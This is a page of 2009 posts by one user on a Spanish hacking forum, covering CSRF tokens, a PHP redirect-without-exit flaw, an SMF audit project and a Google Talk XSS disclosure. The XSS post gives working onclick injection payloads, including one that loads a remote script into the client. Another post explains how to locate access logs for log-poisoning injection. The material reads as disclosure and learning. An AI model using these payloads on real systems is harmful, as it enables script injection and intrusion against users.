Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - WHK

#3691
Nivel Web / Re: saltear codigo ‭‬javascript
23 Octubre 2009, 07:20 AM
esa función está en una prueba nueva del warzone, supongo que no es esa la web que estas tratando de ver si tiene fallas xD
#3692
Nivel Web / Re: token contra CSRF
22 Octubre 2009, 22:06 PM
cuando el usuario inicia sesion le haces session_start() y le declaras una variable en su base de datos llamada, luego cuano se carguen los datos a la variable donde contiene los datos del usuario con select * from users tendrás el valor del token y utilizas ese para todos los formularios, luego verificas si el valor del token enviado por la peticion post corresponde al token de su sesion entonces todo bien, si no entonces que indique que su sesion no es valida.
#3693
Nivel Web / Re: token contra CSRF
21 Octubre 2009, 20:53 PM
esque si haces un solo token para todo entonces el que entre al sistema podrá obtener ese token y usarlo contra otro usuario de esepanel y en el caso de que fuera uno por usuario estarias dando la posibilidad de que si alguien llega a robarle el token a alguien este le podrá ejecutar csrf, en cambio si ese token cambia en cada formulario aunque yo te robe el token no podré ejecutarte nada porque no se cual será el proximo token.
#3694
Nivel Web / Re: XSS en Google Talk 1.0.0.105
21 Octubre 2009, 20:49 PM
google no pierde el tiempo en demandar a la gente que encuentra bugs en sus sistemas, todo lo contrario.. deben sentirse agradecidos porque hay gente que trabaja gratuitamente buscando bugs en sus sistemas para hacerlos mejores y se ahorran los auditores de código :P de hecho si nadie desvelara ningun bug de windows todavía estaríamos en la tecnologia de win 98
#3695


Proyecto SimpleAudit 2.0

Es un proyecto destinado a realizar auditorías de seguridad a nivel WEB hacia el software de SMF 2.0 (Simple Machines Forum) con la finalidad de que sus desarrolladores puedan crear cada dia un software mas robusto y seguro.




Integrantes - (participando en el proyecto)

Colaboradores (forman parte del proyecto pero necesitaran encontrar algo antes de tener acceso al resto de los reportes):




Vulnerabilidades encontradas
45
(40 reportadas + 0 notificadas + 5 privadas)
Último disclosure: 1 de diciembre
Próximo disclosure: 1 de enero

Backdoors encontrados
1





Todos los resultados se irán mostrando en este lugar con todos sus detalles.

Si tienes algún comentario, pregunta, aporte o lo que necesites compartir puedes hacerlo en este post:
http://foro.elhacker.net/nivel_web/proyecto_de_auditoria_a_smf_20_laboratorio_de_bugsnivel_web-t271095.0.html

Si hay algúna vulnerabilidad o bug que no aparece en este lugar es porque todavía se mantiene en privado hasta cumplirse el plazo estimado para su posible reparación o publicación futura.




Puedes seguir la auditoría en Twitter:
http://twitter.com/simpleaudit

Además en FeedBurner:
Código (html4strict) [Seleccionar]
<a href="http://twitter.com/simpleaudit">
http://feeds.feedburner.com/Twitter/Simpleaudit.gif
</a>




Meneame:
http://meneame.net/story/localizaron-mas-40-bugs-auditoria-smf-2.0
#3696
todos los resultados de las investigaciones se irán publicando en un post aparte, este será soalmente para ir haciendo preguntas, explicaciones, alguien que quiera compartir algo, etc.
#3697
Nivel Web / Re: Evitar cookie nula en php
18 Octubre 2009, 19:02 PM
Ese es un bug de PHP, puedes actualizar php y no te debería suceder eso, es path disclosure.

Por otra parte:
Código (php) [Seleccionar]
<?php
session_start
();
if (
$_SESSION['auth'] != 'YES') {
    
header('Location: index.php');
}
echo 
'Panel de admin';
?>


está mal hecho porque enviará el header de redirección pero de todas formas dirá panel de admin ya que el script nunca terminó, o sea.... el servidor envía el header "location: index.php" y el explorador lo interpretará y se redireccionará pero en realidad también mostrará el contenido del panel de administración y cualquiera podría ingresar omitiendo ese header o haciendo la petición desde la consola de comandos.
Lo que debes hacer es ponerle un exit para que el script no siga:

Código (php) [Seleccionar]
<?php
session_start
();
if (
$_SESSION['auth'] != 'YES') {
 
header('Location: index.php');
 exit;
}
echo 
'Panel de admin';
?>
#3698
Nivel Web / XSS en Google Talk 1.0.0.105
18 Octubre 2009, 01:54 AM
Bueno, comenzé a probar en una virtual de gtalk a gtalk y me encontré con dos xss.
Por ejemplo cuando uno escribe un enlace http://<h1>test se ejecuta inmediatamente ya que el enío del string dentro de un href no se filtra y eso significa que un xss puede alojarse en el nombre de la url y el otro en la url misma como código html.

Cuando escribimos http://<h1>test en realidad se imprime esto: <a href='http://<h1>test'>http://<h1>test</a> y como se utilizan comillas simples para los tags de html podemos escapar con http://'onclick='alert(/lol/)'x=' y quedará masomenos así:
<a href='http://'onclick='alert(/lol/)'x=''>http://'onclick='alert(/lol/)'x='</a>

xDD y el resultado es algo asi como esto:



Conversando con SirDarckCat estubimos casi toda la noche jugando con el google talk cambiandole el fondo por una imagen de doom3, paisajes, coloreando los bordes, letras hasta que a el se le ocurrió inyectar el firebug y saber un poco mas del código fuente ya que en realidad no habia archivo temporal porque utilizaba un iframe de internet explorer 6 con la dirección about:blank haciendo document.write



A los que quiean inyectar el firebug pueden escribir estas dos lineas:
Citarhttp://'onclick='document.body.appendChild(document.createElement("script")).src="http://getfirebug.com/releases/lite/1.2/firebug-lite-compressed.js"'x=';
hacerle click y luego
Citarhttp://'onclick='alert(firebug.init())'x='
y al hacerle click llamarán a firebug  :P

Está entetenido.
Para los que quieran descompilar el ejecutable del gtalk está cifrado en molebox 2.5.7 .
#3699
Nivel Web / Re: Bug en Youtube
17 Octubre 2009, 10:27 AM
esto es viejo, de esa misma forma hay muchos videos que han tenido la primera posicion en todas las listas de videos como por ejemplo la mujer que sube las escaleras con falda roja con miles de milllones de reproducciones y asi varios mas pero les banean las cuentas y les borran los videos, no creo que salga muy acuenta hacerlo.
#3700
Nivel Web / Re: Vulnerabilidades en PHP
16 Octubre 2009, 20:37 PM
ah también es una posibilidad inyectando código en una sesion pero tendrias que buscar si puedes establecer algun tipo de dato en alguna variable si es que el sitio web acepta sesiones y si es que la inicia contigo.

CitarEs lo que se comenta en el artículo, que teóricamente está muy bien, pero que en la práctica es raro encontrar un Server con permisos...
En la mayoría de los servidores compartidos el log de acceso no es uno solo de forma global sino que cada host tiene su propio directorio con acceso a los logs y puedes acceder desde php facilmente, solamente retrocedes un directorio desde public_html y buscas un directorio llamado los, log, accesslogs, acceslog, etc y una ves que lo encuentres el log de aceso tiene el mismo nombre que el dominio, o sea si es ejemplo.com asi mismo se llamará el archivo